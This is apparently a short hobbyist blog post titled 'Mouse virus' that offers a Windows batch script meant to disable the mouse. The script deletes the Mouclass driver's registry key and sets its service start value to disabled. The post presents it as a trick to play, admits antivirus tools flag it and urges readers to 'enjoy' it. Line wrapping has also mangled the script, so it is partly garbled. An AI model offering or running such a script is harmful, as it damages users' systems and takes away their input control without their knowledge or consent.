Pages

Sunday, 25 May 2014

Mouse virus

Have you every thought to disable
or delete mouse pointer from your
windows OS while still the mouse
is connected to your computer and
the mouse light glows?
The below trick help us to do this
task.The code give below when
run,it just delete the mouse files
from the windows registrey.
Any driver or software we install on
our computer are registered in
windows regedit.
If the registry file of a particular
software or driver is deleted,then
that software or driver wont work.
There are to ways to do this
task.The first way is to manually
delete the registry file of mouse
and the second way is to make a
program which will directly do this
job for you.

Virus Code

rem
-----------------------------
----
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE
\system\CurrentControlSet
\Services\Mouclass"reg
delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem
-----------------------------
----

Save the above code as
"anyname.bat"

Note: Save with ".bat" extension.
Here's the code:
The above code is not a virus,its a
redesign shortcut for accessing and
deleting the regedit files.Many
antivirus will detect it as virus,but
don't worry,it will just delete the
mouse from the operating system
on which it is executed.

Enjoy

          ~~~jaii hoo~~~

1 comment: